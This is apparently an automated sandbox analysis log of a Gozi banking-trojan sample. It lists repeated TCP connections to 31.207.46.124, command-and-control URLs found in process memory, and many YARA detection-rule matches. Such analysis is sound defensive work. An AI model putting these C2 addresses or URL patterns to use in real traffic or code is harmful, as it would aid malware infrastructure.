Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.207.46.124 |
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://31.207.46.124/jerry/3nn_2BNEVXd0Rxht2AWGTxC/GW4p8XGNLb/FjhKQ84fH_2BkNicF/oP5tQPlnMrJr/VzmSazt |
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://31.207.46.124/jerry/5BN0ICz4uWiAkFly3NWE/wdb3AqkjVSwyFUhuqrz/lHc_2B4wxe4nLA1HUOqfnP/QlJbnXjOv |
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://31.207.46.124/jerry/jTzxAnqL2OvVUr_2F/fauV7gAxn9qx/8pFCJL9tnDU/iLzaMJ4HX1GykO/HoC2Mc7MKhdMVEZ |
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://config.edge.skype.com/jerry/aSMHh5W2R09y97_/2BTh3L56RxwrH5JH4F/CB8VvX3np/o6NOLngWb2K_2FSc_2BM |
Source: rundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: rundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 00000011.00000002.882964274.000002EFAB757000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: rundll32.exe, 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://internetcoca.in/ |
Source: rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://internetcoca.in/a |
Source: rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398416154.0000000001086000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://internetcoca.in/jerry/T6bm4Th9ln_2Fe/GCStuiGucXHPyvDK2HFa_/2Fnq4Pg9Qcwk7hcp/3kKDARDgW7_2BxB/l |
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://meganetwork.top/ |
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://meganetwork.top/jerry/hMt_2FkMsACDp/Ggtycrpr/3jyWUhPR8uVsI6k_2Bbu1hb/kdbdt_2BOm/9tP_2BQtD9vLJ |
Source: powershell.exe, 00000011.00000002.884674469.000002EFAB931000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://supernetwork.top/ |
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://supernetwork.top/% |
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://supernetwork.top/E |
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://supernetwork.top/jerry/c5L4i7gs7U/TPlgCZUjVlFX76S6w/ptrxQO4jUOhI/F6ePNzRyuKF/MbNtzcp0Ju65aR/Z |
Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR |
Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown |
Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR |
Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown |
Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23 |
Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23 |
Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
